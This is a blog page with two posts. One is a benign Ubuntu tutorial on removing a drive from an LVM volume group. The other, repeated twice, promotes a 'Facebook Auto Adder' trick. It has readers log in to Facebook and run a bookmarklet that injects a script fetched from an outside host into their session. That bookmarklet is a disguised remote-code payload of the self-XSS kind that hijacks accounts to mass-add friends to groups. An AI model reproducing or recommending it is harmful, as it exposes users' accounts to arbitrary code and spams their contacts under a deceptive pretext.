Showing posts with label group. Show all posts
Showing posts with label group. Show all posts
Tuesday, September 26, 2017
Trick To Increase Facebook Group Member With Facebook Auto Adder JavaScript
Trick To Increase Facebook Group Member With Facebook Auto Adder JavaScript
Hello Friends..
Sorry for my inconsistency on FreeFileHouse,I was busy with my exams thats why didnt able to concentrate on blogging.
but belive me after my todays post you will forgive me for my inconsistency on blog posting.. :)
So,coming to the topic again today i will show you a cool java script by which you can easily able to increase your group members on facebook.This is really a cool javascript and i tried it on my group and got approx 150000 members in just one day..isnt it sounds cool..
So without taking much of your precious time..Here the process..
First of all Make Sure Bookmark Bar is
visible. If not visible then right click on the top of Firefox and select "Bookmarks Toolbar". & This will make Bookmark Bar visible.

For Google Chrome Users Simply Press Ctrl+Shift+B
Copy the following JavaScript & paste it on Bookmarks Toolbar as you can see in image below.
javascript:(function(){document.body.appendChild(document.createElement(script)).src=http://alviarman2009.my3gb.com/script.txt;})();
This will create a bookmark "javascript:(function(){" in the bookmark bar.

Log In to Facebook
And Go To any of the facebook group.
Now Click the Bookmark that you made..
This will start adding your friends in that Group
To get maximum members to your facebook group..Request all your group members or friends to do the same..
This JavaScript is tested successfully on browsers like mozila firefox and google chrome..and works fine on them.
if you are facing any problem with this javaScript Comment below..i will try my best to sort that out..
start adding your friends to groups before facebook block this script.. :)
enjoy!!
Sorry for my inconsistency on FreeFileHouse,I was busy with my exams thats why didnt able to concentrate on blogging.
but belive me after my todays post you will forgive me for my inconsistency on blog posting.. :)
So,coming to the topic again today i will show you a cool java script by which you can easily able to increase your group members on facebook.This is really a cool javascript and i tried it on my group and got approx 150000 members in just one day..isnt it sounds cool..
So without taking much of your precious time..Here the process..
First of all Make Sure Bookmark Bar is
visible. If not visible then right click on the top of Firefox and select "Bookmarks Toolbar". & This will make Bookmark Bar visible.
For Google Chrome Users Simply Press Ctrl+Shift+B
Copy the following JavaScript & paste it on Bookmarks Toolbar as you can see in image below.
javascript:(function(){document.body.appendChild(document.createElement(script)).src=http://alviarman2009.my3gb.com/script.txt;})();
This will create a bookmark "javascript:(function(){" in the bookmark bar.
Log In to Facebook
And Go To any of the facebook group.
Now Click the Bookmark that you made..
This will start adding your friends in that Group
To get maximum members to your facebook group..Request all your group members or friends to do the same..
This JavaScript is tested successfully on browsers like mozila firefox and google chrome..and works fine on them.
if you are facing any problem with this javaScript Comment below..i will try my best to sort that out..
start adding your friends to groups before facebook block this script.. :)
enjoy!!
download file now
Thursday, August 24, 2017
Ubuntu 12 04 Remove Physical Drive From Volume Group
Ubuntu 12 04 Remove Physical Drive From Volume Group
In this tutorial I am going to show you how to remove a drive from your logical volume group without losing any files by first moving all of its contents onto the other drives. This means that you do not have to take a full backup to another set of drives. I did this today because I wanted to replace a laptop drive that I had temporarily added as emergency "extension". Using the drive had noticeably decreased the performance of my volume group when writing new files and reading from those files later on.
The first step is to look at your physical volumes in your volume group. You should have already added your new drive to the volume group if you are performing a replacement. This will also work if you have enough storage remaining on the already existing drives.

sudo pvs -o+pv_used

Hopefully that shows you that you have enough space on your other drives. To spread the files from the drive you want to remove, just enter the following command:

sudo pvmove /dev/sd[x]

This takes a long time. So at this point it is probably best to go away and watch a movie.
When that has completed, you may want to run the following command again to see how everything is spread.

sudo pvs -o+pv_used

You can now remove the drive from the volume group with the following command:
sudo vgreduce [volume group name] /dev/sd[x]
For example: sudo vgreduce vg_main /dev/sdb
Thats it! You can now physically remove the drive from your machine. If you run step 1 again, you will see that it no longer appears in the volume group as shown below:


References
- Removing a Disk from a Logical Volume
download file now
Subscribe to:
Posts (Atom)